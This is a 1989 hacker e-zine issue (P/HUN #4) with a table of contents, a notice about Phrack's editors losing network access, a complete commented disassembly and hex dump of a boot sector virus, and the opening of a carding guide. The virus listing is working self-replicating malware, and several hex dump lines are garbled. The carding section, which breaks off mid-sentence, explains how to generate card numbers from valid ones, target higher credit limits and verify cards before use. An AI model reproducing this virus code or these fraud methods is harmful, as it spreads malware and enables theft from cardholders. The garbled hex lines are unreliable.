

()=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=()







  P/HUN Issue #4 , Volume 2                     Articles [11]



  Released: June 27th of 1989.                  Comments: SummerCon 89'















                     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



                   = The Toll Center Bulletin Board System =



                     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







          ( 2600 Magazine BBS # 5 & P/HUN Magazine Inc. Headquarters)







                              (718)358/9209







                               Presents......







                          -== P/HUN ISSUE IV ==-



                              --------------



                    P/HUN Issue #4, Volume 2: Phile 1 of 11



                    DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD











Introduction:



-------------



Welcome once again to another exiciting issue of P/HUN Magazine.







We are little behind schedule. The delay was caused by a severe disk crash



which wiped out most of the files. The whole issue had to be put back together



again.







This time we have a special segment called P/HUN Telecom News/Advancements,



which contains the latest news in the telecommunications industry as we know



today. This segment will be released on a regular basis. I would like to thank



DareDevil for taking the first shot it. We would appreciate some feedback on



this new concept.







If you have any articles to contribute please get in touch with us at our



BBS or at our Usenet address.















                                                   Red Knight



                                       Usenet Address: pdave@dasys1.UUCP



                                            SysOp of The Toll Center



                                         Phortune 500/Board of Directors



-------------------------------------------------------------------------------



                            =:Table of Contents:=



                              ------------------







#      Phile Description                             Author             Size



--     -------------------------------------------   ------             ------



1)     Introduction & Table of Contents              Red Knight         2K



2)     The Banishment of Phrack Inc.                 Knight Lightning   5K



3)     A Boot Sector Virus                           Southern Cross     21K



4)     Vital Credit Card Information & Usage         The Sparrow        31K



5)     An Introduction to House Explosives           Franz Liszt        19K



6)     TSPS No. 1B - Call Processing & Explanation   Phelix the Hack    34K



7)     Free Computer Magazines                       Southern Cross     6K



8)     A Guide to Hacking AMOS                       NightCrawler       21K



9)     USDN versus ISDN                              Lord Micro         22K



10)    P/HUN Telecom News/Advancements               DareDevil          30K



11)    P/HUN Telecom News/Advamcements               DareDevil          24K







-------------------------------------------------------------------------------







                     P/HUN Issue #4, Volume 2: Phile 2 of 11



                     DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD







                         The Banishment Of Phrack Inc.



                               -----------------------------



                              by Knight Lightning







                        June 27, 1989 - August 28, 1989







Hello.  This message is being sent to all members of the Phrack Inc. Mailing



List to forewarn you of things to come.  Due to certain policies at the



University Of Missouri - Columbia (UMCVMB), Taran King and I will lose our



Bitnet/Internet accounts on June 27, 1989.  I would advise not sending files or



mail to either of our address after June 26, 1989 just to be safe.







Our "exile" from UMCVMB will last until August 28, 1989 when fall classes



begin.  However, this does not mean we are putting Phrack Inc. on hold by any



means.







Solution:  Anyone who has files to be placed in Phrack Inc. after June 26, 1989



should contact HATCHET MOLLY.  He can be reached at "TK0GRM2@NIU.BITNET" or



"TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU".  He will be handling the gathering of



files from you... our network friends.







Phrack Inc. Newsletter Issue 27 will be released within the next TWO WEEKS.  If



you would like to receive this issue, please let me know as soon as possible.



The reason I make mention of this is because many people on the mailing list



are not currently accessing their work station for a variety of reasons



(school's out, on vacation, etc).  So let us know and we will send it to you



when we release it.







The situation with our Bitnet/Internet addresses will not affect SummerCon '89



in any way.  However, any issues of Phrack Inc. that we do release between June



27, 1989 and August 28, 1989 will *NOT* be sent over the networks to you until



September 1989.  Taran King and I will not have access to the network and will



have no way to send these files until then.  So it looks like bulletin boards



and software pirates will get first look during this time period.







So if you have any further questions about this situation, mail us right away.



Remember, any comments or information for Phrack Inc. after June 26, 1989



should be directed to Hatchet Molly.







             Knight Lightning                       Taran King



          C483307@UMCVMB.BITNET                C488869@UMCVMB.BITNET



       C483307@UMCVMB.MISSOURI.EDU          C488869@UMCVMB.MISSOURI.EDU







                                 Hatchet Molly



                              TK0GRM2@NIU.BITNET



                      TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU











                       "The Real Future Is Behind You!"



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







                    P/HUN Issue #4, Volume 2: Phile 3 of 11



                    DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD



                             A BOOT SECTOR VIRUS



                                 5/15/89











The following is a disassembled and commented version of the Alemeda



College Boot infector virus.  Courtesy of Southern Cross.











;-----------------------------------------------------------------------;



; This virus is of the "FLOPPY ONLY" variety.                           ;



; It replicates to the boot sector of a floppy disk and when it gains control



; it will move itself to upper memory.  It redirects the keyboard       ;



; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time  ;



; it will attempt to infect any floppy it finds in drive A:.            ;



; It keeps the real boot sector at track 39, sector 8, head 0           ;



; It does not map this sector bad in the fat (unlike the Pakistani Brain)



; and should that area be used by a file, the virus                     ;



; will die.  It also contains no anti detection mechanisms as does the  ;



; BRAIN virus.  It apparently uses head 0, sector 8 and not head 1      ;



; sector 9 because this is common to all floppy formats both single     ;



; sided and double sided.  It does not contain any malevolent TROJAN    ;



; HORSE code.  It does appear to contain a count of how many times it   ;



; has infected other diskettes although this is harmless and the count  ;



; is never accessed.                                                    ;



;                                                                       ;



; Things to note about this virus:                                      ;



; It can not only live through an ALT-CTRL-DEL reboot command, but this ;



; is its primary (only for that matter) means of reproduction to other  ;



; floppy diskettes.  The only way to remove it from an infected system  ;



; is to turn the machine off and reboot an uninfected copy of DOS.      ;



; It is even resident when no floppy is booted but BASIC is loaded      ;



; instead.  Then when ALT-CTRL-DEL is pressed from inside of BASIC,     ;



; it activates and infectes the floppy from which the user is           ;



; attempting to boot.                                                   ;



;                                                                       ;



; Also note that because of the POP CS command to pass control to       ;



; its self in upper memory, this virus does not to work on 80286        ;



; machines (because this is not a valid 80286 instruction).             ;



;                                                                       ;



; The Norton Utilities can be used to identify infected diskettes by    ;



; looking at the boot sector and the DOS SYS utility can be used to     ;



; remove it (unlike the Pakistani Brain).                               ;



;-----------------------------------------------------------------------;



                        ;



    ORG  7C00H               ;



                        ;



TOS LABEL     WORD           ;TOP OF STACK



;-----------------------------------------------------------------------;



; 1. Find top of memory and copy ourself up there. (keeping same offset);



; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;



; 3. Redirect int 9 (keyboard) to ourself in top of memory              ;



; 4. Jump to ourself at top of memory                                   ;



; 5. Load and execute REAL boot sector from track 40, head 0, sector 8  ;



;-----------------------------------------------------------------------;



BEGIN:   CLI                 ;INITIALIZE STACK



    XOR  AX,AX               ;



    MOV  SS,AX               ;



    MOV  SP,offset TOS       ;



    STI                 ;



                        ;



    MOV  BX,0040H       ;ES = TOP OF MEMORY - (7C00H+512)



    MOV  DS,BX               ;



    MOV  AX,[0013H]          ;



    MUL  BX             ;



    SUB  AX,07E0H       ;   (7C00H+512)/16



    MOV  ES,AX               ;



                        ;



    PUSH CS             ;DS = CS



    POP  DS             ;



                        ;



    CMP  DI,3456H       ;IF THE VIRUS IS REBOOTING...



    JNE  B_10           ;



    DEC  Word Ptr [COUNTER_1]     ;...LOW&HI:COUNTER_1--



                        ;



B_10:    MOV  SI,SP     ;SP=7C00  ;COPY SELF TO TOP OF MEMORY



    MOV  DI,SI               ;



    MOV  CX,512              ;



    CLD                 ;



    REP  MOVSB               ;



                        ;



    MOV  SI,CX     ;CX=0          ;SAVE FIRST 32 INT VETOR ADDRESSES TO



    MOV  DI,offset BEGIN - 128    ;   128 BYTES BELOW OUR HI CODE



    MOV  CX,128              ;



    REP  MOVSB               ;



                        ;



    CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEYBOARD)



                        ;



    PUSH ES   ;ES=HI         ;JUMP TO OUR HI CODE WITH



    POP  CS             ;   CS = ES



                        ;



    PUSH DS   ;DS=0          ;ES = DS



    POP  ES             ;



                        ;



    MOV  BX,SP     ;SP=7C00  ;LOAD REAL BOOT SECTOR TO 0000:7C00



    MOV  DX,CX     ;CX=0          ;   DRIVE A: HEAD 0



    MOV  CX,2708H       ;   TRACK 40, SECTOR 8



    MOV  AX,0201H       ;   READ SECTOR



    INT  13H            ;   (common to 8/9 sect. 1/2 sided!)



    JB   $              ;   HANG IF ERROR



                        ;



    JMP  JMP_BOOT       ;JMP 0000:7C00



                        ;



;-----------------------------------------------------------------------;



; SAVE THEN REDIRECT INT 9 VECTOR                                       ;



;                                                                       ;



; ON ENTRY:   DS = 0                                                    ;



;        ES = WHERE TO SAVE OLD_09 & (HI)                               ;



;             WHERE NEW_09 IS         (HI)                              ;



;-----------------------------------------------------------------------;



PUT_NEW_09:                  ;



    DEC  Word Ptr [0413H]    ;TOP OF MEMORY (0040:0013) -= 1024



                        ;



    MOV  SI,9*4              ;COPY INT 9 VECTOR TO



    MOV  DI,offset OLD_09    ;   OLD_09 (IN OUR HI CODE!)



    MOV  CX,0004             ;



                        ;



    CLI                 ;



    REP  MOVSB               ;



    MOV  Word Ptr [9*4],offset NEW_09



    MOV  [(9*4)+2],ES        ;



    STI                 ;



                        ;



    RET                 ;



                        ;



;-----------------------------------------------------------------------;



; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR                              ;



;-----------------------------------------------------------------------;



ACK_KEYBD:                   ;



    IN   AL,61H              ;RESET KEYBOARD THEN CONTINUE



    MOV  AH,AL               ;



    OR   AL,80H              ;



    OUT  61H,AL              ;



    XCHG AL,AH               ;



    OUT  61H,AL              ;



    JMP  RBOOT               ;



                        ;



;-----------------------------------------------------------------------;



; DATA AREA WHICH IS NOT USED IN THIS VERSION                           ;



; REASON UNKNOWN                                                        ;



;-----------------------------------------------------------------------;



TABLE    DB   27H,0,1,2      ;FORMAT INFORMATION FOR TRACK 39



    DB   27H,0,2,2      ;   (CURRENTLY NOT USED)



    DB   27H,0,3,2      ;



    DB   27H,0,4,2      ;



    DB   27H,0,5,2      ;



    DB   27H,0,6,2      ;



    DB   27H,0,7,2      ;



    DB   27H,0,8,2      ;



                        ;



;A7C9A   LABEL     BYTE           ;



    DW   00024H              ;NOT USED



    DB   0ADH           ;



    DB   07CH           ;



    DB   0A3H           ;



    DW   00026H              ;



                        ;



;L7CA1:                      ;



    POP  CX             ;NOT USED



    POP  DI             ;



    POP  SI             ;



    POP  ES             ;



    POP  DS             ;



    POP  AX             ;



    POPF                ;



    JMP  1111:1111      ;



                        ;



;-----------------------------------------------------------------------;



; IF ALT & CTRL & DEL THEN ...                                          ;



; IF ALT & CTRL & ? THEN ...                                            ;



;-----------------------------------------------------------------------;



NEW_09:  PUSHF                    ;



    STI                 ;



                        ;



    PUSH AX             ;



    PUSH BX             ;



    PUSH DS             ;



                        ;



    PUSH CS             ;DS=CS



    POP  DS             ;



                        ;



    MOV  BX,[ALT_CTRL]       ;BX=SCAN CODE LAST TIME



    IN   AL,60H              ;GET SCAN CODE



    MOV  AH,AL               ;SAVE IN AH



    AND  AX,887FH       ;STRIP 8th BIT IN AL, KEEP 8th BIT AH



                        ;



    CMP  AL,1DH              ;IS IT A [CTRL]...



    JNE  N09_10              ;...JUMP IF NO



    MOV  BL,AH               ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)



    JMP  N09_30              ;



                        ;



N09_10:  CMP  AL,38H              ;IS IT AN [ALT]...



    JNE  N09_20              ;...JUMP IF NO



    MOV  BH,AH               ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)



    JMP  N09_30              ;



                        ;



N09_20:  CMP  BX,0808H       ;IF (CTRL DOWN & ALT DOWN)...



    JNE  N09_30              ;...JUMP IF NO



                        ;



    CMP  AL,17H              ;IF [I]...



    JE   N09_X0              ;...JUMP IF YES



    CMP  AL,53H              ;IF [DEL]...



    JE   ACK_KEYBD      ;...JUMP IF YES



                        ;



N09_30:  MOV  [ALT_CTRL],BX       ;SAVE SCAN CODE FOR NEXT TIME



                        ;



N09_90:  POP  DS             ;



    POP  BX             ;



    POP  AX             ;



    POPF                ;



                        ;



    DB   0EAH           ;JMP F000:E987



OLD_09   DW   ?              ;



    DW   0F000H              ;



                        ;



N09_X0:  JMP  N09_X1              ;



                        ;



;-----------------------------------------------------------------------;



;                                                                       ;



;-----------------------------------------------------------------------;



RBOOT:   MOV  DX,03D8H       ;DISABLE COLOR VIDEO !?!?



    MOV  AX,0800H       ;AL=0, AH=DELAY ARG



    OUT  DX,AL               ;



    CALL DELAY               ;



    MOV  [ALT_CTRL],AX  ;AX=0     ;



                        ;



    MOV  AL,3 ;AH=0          ;SELECT 80x25 COLOR



    INT  10H            ;



    MOV  AH,2           ;SET CURSOR POS 0,0



    XOR  DX,DX               ;



    MOV  BH,DH               ;   PAGE 0



    INT  10H            ;



                        ;



    MOV  AH,1           ;SET CURSOR TYPE



    MOV  CX,0607H       ;



    INT  10H            ;



                        ;



    MOV  AX,0420H       ;DELAY (AL=20H FOR EOI BELOW)



    CALL DELAY               ;



                        ;



    CLI                 ;



    OUT  20H,AL              ;SEND EOI TO INT CONTROLLER



                        ;



    MOV  ES,CX     ;CX=0 (DELAY)  ;RESTORE FIRST 32 INT VECTORS



    MOV  DI,CX               ;   (REMOVING OUR INT 09 HANDLER!)



    MOV  SI,offset BEGIN - 128    ;



    MOV  CX,128              ;



    CLD                 ;



    REP  MOVSB               ;



                        ;



    MOV  DS,CX     ;CX=0          ;DS=0



                        ;



    MOV  Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR



    MOV  [(19H*4)+2],CS      ;



                        ;



    MOV  AX,0040H       ;DS = ROM DATA AREA



    MOV  DS,AX               ;



                        ;



    MOV  [0017H],AH     ;AH=0     ;KBFLAG (SHIFT STATES) = 0



    INC  Word Ptr [0013H]    ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)



                        ;



    PUSH DS             ;IF BIOS F000:E502 == 21E4...



    MOV  AX,0F000H      ;



    MOV  DS,AX               ;



    CMP  Word Ptr [0E502H],21E4H  ;



    POP  DS             ;



    JE   R_90           ;



    INT  19H            ;   IF NOT...REBOOT



                        ;



R_90:    JMP  0F000:0E502H        ;...DO IT ?!?!?!



                        ;



;-----------------------------------------------------------------------;



; REBOOT INT VECTOR                                                     ;



;-----------------------------------------------------------------------;



NEW_19:  XOR  AX,AX               ;



                        ;



    MOV  DS,AX               ;DS=0



    MOV  AX,[0410]      ;AX=EQUIP FLAG



    TEST AL,1           ;IF FLOPPY DRIVES ...



    JNZ  N19_20              ;...JUMP



N19_10:  PUSH CS             ;ELSE ES=CS



    POP  ES             ;



    CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEYBOARD)



    INT  18H            ;LOAD BASIC



                        ;



N19_20:  MOV  CX,0004             ;RETRY COUNT = 4



                        ;



N19_22:  PUSH CX             ;



    MOV  AH,00               ;RESET DISK



    INT  13             ;



    JB   N19_81              ;



    MOV  AX,0201             ;READ BOOT SECTOR



    PUSH DS             ;



    POP  ES             ;



    MOV  BX,offset BEGIN          ;



    MOV  CX,1           ;TRACK 0, SECTOR 1



    INT  13H            ;



N19_81:  POP  CX             ;



    JNB  N19_90              ;



    LOOP N19_22              ;



    JMP  N19_10              ;IF RETRY EXPIRED...LOAD BASIC



                        ;



;-----------------------------------------------------------------------;



; Reinfection segment.                                                  ;



;-----------------------------------------------------------------------;



N19_90:  CMP  DI,3456             ;IF NOT FLAG SET...



    JNZ  RE_INFECT      ;...RE INFECT



                        ;



JMP_BOOT:                    ;PASS CONTROL TO BOOT SECTOR



    JMP  0000:7C00H          ;



                        ;



;-----------------------------------------------------------------------;



; Reinfection Segment.                                                  ;



;-----------------------------------------------------------------------;



RE_INFECT:                   ;



    MOV  SI,offset BEGIN          ;COMPARE BOOT SECTOR JUST LOADED WITH



    MOV  CX,00E6H       ;   OURSELF



    MOV  DI,SI               ;



    PUSH CS             ;



    POP  ES             ;



    CLD                 ;



    REPE CMPSB               ;



    JE   RI_12               ;IF NOT EQUAL...



                        ;



    INC  Word Ptr ES:[COUNTER_1]  ;INC. COUNTER IN OUR CODE (NOT DS!)



                        ;



;MAKE SURE TRACK 39, HEAD 0 FORMATTED  ;



    MOV  BX,offset TABLE          ;FORMAT INFO



    MOV  DX,0000             ;DRIVE A: HEAD 0



    MOV  CH,40-1             ;TRACK 39



    MOV  AH,5           ;FORMAT



    JMP  RI_10               ;REMOVE THE FORMAT OPTION FOR NOW !



                        ;



; <<< NO EXECUTION PATH TO HERE >>>    ;



    JB   RI_80               ;



                        ;



;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0



RI_10:   MOV  ES,DX               ;ES:BX = 0000:7C00, HEAD=0



    MOV  BX,offset BEGIN          ;TRACK 40H



    MOV  CL,8           ;SECTOR 8



    MOV  AX,0301H       ;WRITE 1 SECTOR



    INT  13H            ;



                        ;



    PUSH CS             ;   (ES=CS FOR PUT_NEW_09 BELOW)



    POP  ES             ;



    JB   RI_80               ;IF WRITE ERROR...JUMP TO BOOT CODE



                        ;



    MOV  CX,0001             ;WRITE INFECTED BOOT SECTOR !



    MOV  AX,0301             ;



    INT  13H            ;



    JB   RI_80               ;   IF ERROR...JUMP TO BOOT CODE



                        ;



RI_12:   MOV  DI,3456H       ;SET "JUST INFECTED ANOTHER ONE"...



    INT  19H            ;...FLAG AND REBOOT



                        ;



RI_80:   CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEYBOARD)



    DEC  Word Ptr ES:[COUNTER_1]  ;   (DEC. CAUSE DIDNT INFECT)



    JMP  JMP_BOOT       ;



                        ;



;-----------------------------------------------------------------------;



;                                                                       ;



;-----------------------------------------------------------------------;



N09_X1:  MOV  [ALT_CTRL],BX       ;SAVE ALT & CTRL STATUS



                        ;



    MOV  AX,[COUNTER_1]      ;PUT COUNTER_1 INTO RESET FLAG



    MOV  BX,0040H       ;



    MOV  DS,BX               ;



    MOV  [0072H],AX          ;   0040:0072 = RESET FLAG



    JMP  N09_90              ;



                        ;



;-----------------------------------------------------------------------;



; DELAY                                                                 ;



;                                                                       ;



; ON ENTRY    AH:CX = LOOP COUNT                                        ;



;-----------------------------------------------------------------------;



DELAY:   SUB  CX,CX               ;



D_01:    LOOP $              ;



    SUB  AH,1           ;



    JNZ  D_01           ;



    RET                 ;



                        ;



;-----------------------------------------------------------------------;



;                                                                       ;



;-----------------------------------------------------------------------;



A7DF4         DB   27H,00H,8,2







COUNTER_1     DW   001CH



ALT_CTRL DW   0







A7DFC         DB   27H,0,8,2







END



;-----------------------------------------------------------------------;



; Hexadecimal representation.                                           ;



;-----------------------------------------------------------------------;



;7C00    FA 31 C0 8E D0 BC 00 7C-FB BB 40 00 8E DB A1 13   z1@.P<.|$;@..[!.



;7C10    00 F7 E3 2D E0 07 8E C0-0E 1F 81 FF 56 34 75 04   .wc-..@....V4u.



;7C20    FF 0E F8 7D 89 E6 89 F7-B9 00 02 FC F3 A4 89 CE   ..x.f.w9..|s$.N



;7C30    BF 80 7B B9 80 00 F3 A4-E8 15 00 06 0F 1E 07 89   ?.$9..s$h.......



;7C40    E3 89 CA B9 08 27 B8 01-02 CD 13 72 FE E9 38 01   c.J9.'8..M.rDi8.



;7C50    FF 0E 13 04 BE 24 00 BF-E6 7C B9 04 00 FA F3 A4   ....>$.?f|9..zs$



;7C60    C7 06 24 00 AD 7C 8C 06-26 00 FB C3 E4 61 88 C4   G.$.-|..&.$Cda.D



;7C70    0C 80 E6 61 86 C4 E6 61-EB 73 27 00 01 02 27 00   ..fa.Dfaks'...'.



;7C80    02 02 27 00 03 02 27 00-04 02 27 00 05 02 27 00   ..'...'...'...'.



;7C90    06 02 27 00 07 02 27 00-08 02 24 00 AD 7C A3 26   ..'...'.$.-|#&



;7CA0   09 5F 5E 07 1F 58 9D-EA 11 11 1 FB    .Y_^..X.j.....$P



;7CB0    53 1E 0E 1F 8B 1E FA 7D-E4 60 88 C4 25 7F 88    S.....zd.D%..<



;7CC0    1D 75 04 88 E3 EB 16 3C-38 75 04 88 E7 EB 0E    .u..ck.<8u..gk..



;7CD0    FB 08 08 75 08 3C 17 74-11 3C 53 74 8F 89 1E    $..u.<.t.<St...z



;7CE0    7D 1F 5B 58 9D EA 87 E9-00 F0 E9 EB 00 BA D8 03 .[X.j.i.pik.:X.



;7CF0    B8 00 08 EE E8 F3 00 A3-FA 7D B0 03 CD 10 B4 02  ..nhs.#z0.M.4.



;7D00    31 D2 88 F7 CD 10 B4 01-B9 07 06 CD 108 20 04   1R..4.9..M.8 .



;7D10    E8 D7 00 FA E6 20 8E C1-89 CF BE 80 7B B9 80 00   hW.zfA.O>.$9..



;7D20    FC F3 A4 8E D9 C7 06 64-00 52 7D 8C 0E 66 00 B8   |s$.YG.R..f.8



;7D30    40 00 8E D8 88 26 17 00-FF 06 13 00 1E B8 00 F0   @..X.&.....8.p



;7D4    8E D8 81 3E 02 E5 E4 21-1F 74 02 CD 19 EA 02 E5   .X.>.ed!.t.M.e



;7D50    00 F0 31 C0 8E D8 A1 10-04 A8 01 75 07 0E 07 E8   .p1@.X!..(.u..



;7D60    EE FE CD 18 B9 04 00 51-B4 00 CD 13 72 0D B8 01   nDM.9..Q4.M.r.8



;7D70    02 1E 07 BB 00 7C B9 01-00 C3 59 73 04 E2 E7   ...;.|9..M.Ys.bg



;780    EB DB 81 FF 56 34 75 05-EA 00 7C 00 00 BE 00 7C   k[..V4u|..>.|



;7D90    B9 E6 00 89 F7 0E 07 FC-F3 A6 74 2D 26 FF 06 F8   9f..w..|t-&..x



;7DA0    7D BB 7A 7C BA 00 00 B5-27 B4 05 EB 02 72 1F 8E   ;z|:..5.k.r..



;7DB0    C2 BB 00 7C B1 08 B8 01-03 CD 13 0E 07 72 0F B9   B;.|1.8....r.9



;7DC0    01 00 B8 01 03 CD 13 72-05 BF 56 34 CD 19 E8 7F   ..8..M.rV4M.h.



;7DD0    FE 26 FF 0E F8 7D EB B0-89 1E FA 7D A1 F8 7D BB   D&..xk0!x;



;7DE0    40 00 8E DB A3 72 0E9-F7 FE 29 C9 E2 FE 80 EC   @..[#r.iwIbD.l



;7DF0    01 75 F9 C3 27 00 08 02-1C 00 00 00 27 00 08 02   .uyC'.....'...



;---------------------------------------------------------------------;



End of commented code for the Alameda College Boot Infector Virus.  All



viruses are dangerous.I take no responsibility for damages, outbreaks, or



other ramifications caused by misuse.  This phile is for educational purpose



only!   I expect everyone to use caution and common sense when dealing with



viruses.  Enjoy!







=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







                   P/HUN Issue #4, Volume 2: Phile 4 of 11



                   DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD







                    Vital Credit Card Information and Usage







                                      or







                          Fun with Numbers revision A















                Compiled, and made intelligible by The Sparrow







** MANY Thanks to Codebreaker; for without him I would be lost. (in JFK?)



A big thankyou to The White Rider for proof-reading this.



  ( If you find any mistakes, BLAME HIM!!! HAHAHA)







Hello to: Fry Guy ("You've got to hear about this new scam. . .")



          Video Vindicator ("Fly down and let's go casing!")







_____________________________________________________________________________











Completion Date: Tuesday, November Twenty-second, in the year of our Lord, one



thousand, nine hundred, eighty eight, 3:39 am.







Last Updated On: Tuesday, March Twenty-second, in the year of our Lord, one



thousand, nine hundred, eighty nine, 5:01 am.







______________________________________________________________________________







The following is list of ideas and facts that have been brought together for



the sole purpose of educating those who lack this knowledge. In writing this, I



do not intend for the reader to use any information contained herein, but



rather to further his/her own education and provoke thought to perhaps better



the society we live in.







______________________________________________________________________________















I. Card Types







     The first digit of the credit card number (henceforth referred to as CCN)



determines the credit card type. A simple list might be:







         First Digit of Credit Card              Card Type



         --------------------------              ---------







                   3                          American Express



                   4                                Visa



                   5                             Mastercard



                   6                              Discover















II. Bank and Branch Numbers







                                   Sample Credit Card: 1234 567 890 123



                                                         ^



                                                         |



     Within the first group of numbers from the left [called Group 4] the Bank



name and branch are contained. We have already discovered that the first digit



of Group 4 reveals the card type. We will now look at how to decipher which



bank issued the card, and which branch of the bank the actual card holder banks



at. Look at the Second, Third, and Fourth digits of Group 4. These three



numbers tell which bank issued the card. A small list follows this paragraph,



although you can compile a list by yourself. Just glance at cards you get your



hands on which the bank name is printed, and record the information. [ Editor's



Note: This is a hard concept to explain, so let me give you an example. Lets



say Bank of Hicksville's group 4 Visa Credit Card reads 4560. (560 = Bank of



Hicksville). BUT, 4561 is NOT necessarily Bank of Hicksville, too. 4561 could



be Bank of Booniesville. So what I am trying to get across is that the next



bank in line doesn't HAVE to be 4570 -- it could be earlier in numbers. ]























----------VISA



          ----







 Group 4            Bank Name



--------            ---------



  4019              Bank of America



  4024              Bank of America



  4052              First Cincinatti



  4060              Navy Federal Credit Union



  4128              Citibank



  4131              State Street Bank



  4215              Marine Midland



  4225              Chase Manhattan



  4231              Chase Lincoln First Classic



  4232              Chase Lincoln First Classic



  4241              Nat. Westminester Bank



  4250              First Chicago Bank



  4271              Citibank Preferred



  4302              H.H.B.C.



  4310              Imperial Savings



  4317              Gold Dome



  4387              Bank One



  4428              Bank of Hoven



  4811              Bank of Hawaii



  4897              Village bank of Cincinatti











 ----------Mastercards



           -----------







 Group 4            Bank Name



---------           ---------







  5215              Marine Midland



  5217              Manufacturers Hanover Trust



  5233              Huntington Bank



  5242              Chevy Chase Federal Savings



  5254              Bank of America



  5263              Chemical Bank



  5273              Bank of America



  5286              Chase Lincoln First



  5317              Norwest



  5323              Bank of New York



  5329              Maryland Bank NA (MBNA)



  5410              Citibank Preferred



  5411              1st Fin. bank of Omaha



  5414              Nat. Westminester Bank



  5415              Colonial National Bank



  5424              Citibank



  5465              Chase Manhattan



  5678              Marine Midland















III. Bank Codes [ International Bank or Interlink Numbers]







     These are used in checking credit. Later on, you will learn that while



checking the credit cards for the amount of credit, you will be prompted to



enter the Bank ID along with the Merchant ID. The bank IDs are, I believe, from



the following list. One note-- you cannot just choose any Bank ID and use it



with any merchant ID. They must correspond in some way. How, I don't know. I



THINK that a bank issues a merchant number to each of their customers. If you



try to use a merchant number with a bank number, and the merchant doesn't



actually use the bank that is specified by the bank number, you are going to



get some problems. (ie, the verification won't go through.) Again, I will state



that this is only a theory. The reason that I post this theory is to get minds



working. So far, no one has mentioned their ideas on the function of Bank



Codes. If you do happen to find out the true meaning of these numbers, please



get in touch with me so I can update this list. Thanks. One word- on VISA



credit cards, the bank IDs are the first 4 digits of the Card. For Mastercards,



however, they vary. A list follows:







     Bank                       Bank Code



     ----                       ---------



 Chemical Bank                    1263



 Marine Midland                   6207 [1207?]



 Manufacturers Hanover Trust      1033



 Citibank                         1035



 Huntington                       1226



 First Card Gold                  1286



 MBNA                             6017



 Chase Manhatten                  1665



 [ Bank from 5127 ]               1015







IV. "Group 3"







Sample Credit Card: 1234 5678 9012 3456



                           ^



                           |



                           |



                         Group 3, or the second group on a credit card in from



the left, contains some VERY useful information about the card. This group



holds the information on the Maximum Expiration Date and the Maximum Credit



Limit. (I believe that you can all see the benefits of this.) This does not



mean, however, that the ACTUAL expiration date and ACTUAL credit limit are in



this group. What it means is this: When the different Credit Card Companies



issue Credit Cards to the consumer, he of course has a credit limit. And when



the Companies formulate credit cards, they create certain groups for certain



customers. That is, certain "groups" contain all the credit cards for people



with a credit limit between $x and $y. The same thing goes with the expiration



dates. Everyone whose card expires after m1/y1 and before m2/y2 has their



credit card in a certain group formulated by the company. For example:



My name is Joe Schmoe. My Visa credit card expires in January of the year 1999.



My credit limit on this card is $7,000. My credit card number (CCN) will



probably be in the same group as my brother-in-law Jack Koff whose card expires



in December of 1998 and whose credit limit is $6,000. BUT, our cards will be in



different groups entirely than my boss' whose card expires in June of 1995 and



whose credit limit is $40,000.



     Back to the point of section IV: Lets say you have a credit card with a



known expiration date and known credit limit. Lets also say that you happen



upon ANOTHER credit card whose numbers are the same up until the last 2 groups.



(You and I see that these two cards were issued by the same bank and PROBABLY



have a credit limit in the same ball park and an expiration date not far from



each other. ) BUT, even though you have this new credit card, you lost the



expiration date and credit limit. GOSH! How are you going to use this card when



you don't know this information?? APROXIMATE! You have a general idea now, and



you can go from there.



     One warning here: I have found that small groups of cards with high credit



limits are often hidden in between large groups of cards with very low credit



limits. For instance, lets look at this card: 4123 4567 8901 2345. From -4567



until 4600 in group 3 (from the right) gold cards may exist. But after 4600 and



before 4567, cards with credit limits of $500 exist. Kind of sucks, huh?? Just



wanted to make you aware of this.



     Now, once you learn how to modify these without hurting the card, you have



increased your value as a carder by 100x. But be careful. Often when you modify



a card's group 3 to get a higher credit limit line of cards, you will find the



entire line is dead. Or, in other cases, just the original card you find is



dead, and all surrounding cards are valid with the new credit limits.







V. "Group 2" & "Group 1"







     These two groups, or the last two groups on the credit card, are the



easiest to modify. By changing these in such a way, you can formulate new



credit cards simply by doing a little math in your head. These two groups



contain the IDentification codes. Later on in your carding careers, you might



find out how to change these, and thus, you have found the secret to a vault of



new and awaiting credit cards. I stress here that the only purpose that these



two groups serve is to differentiate between customers. If the first two groups



of two cards are the same and the last two groups of two cards are different,



the two cards were issued by the same bank and probably have similar credit



limits, but are of course issued to different people.







VI. Credit Card Verification







     Once you have a newly formulated or newly found Credit Card, you must



first check to see if it is valid before you distribute or use it. The reason



for this is this: Although you may not have faltered in your calculations, and



you created a credit card following the correct formula, the card may turn up



as invalid. This is because it has not been issued yet. Visa or Mastercard has



not issued that card to a customer yet. You are ahead of the credit card



company. (Don't you feel important??!) If this case arises, simply formulate a



new credit card from the original valid credit card, and check it once again.



There is no known way around this except to wait.



     OKAY- you want to check your credit card and see how much money this



person has. There are many, many credit verifiers around. The easiest way to



get ahold of one is to go into any store which accepts credit cards and look on



the side of the machine that imprints the carbons with the credit card number,



etc. Or, look right on the wall next to the register. There should be a number



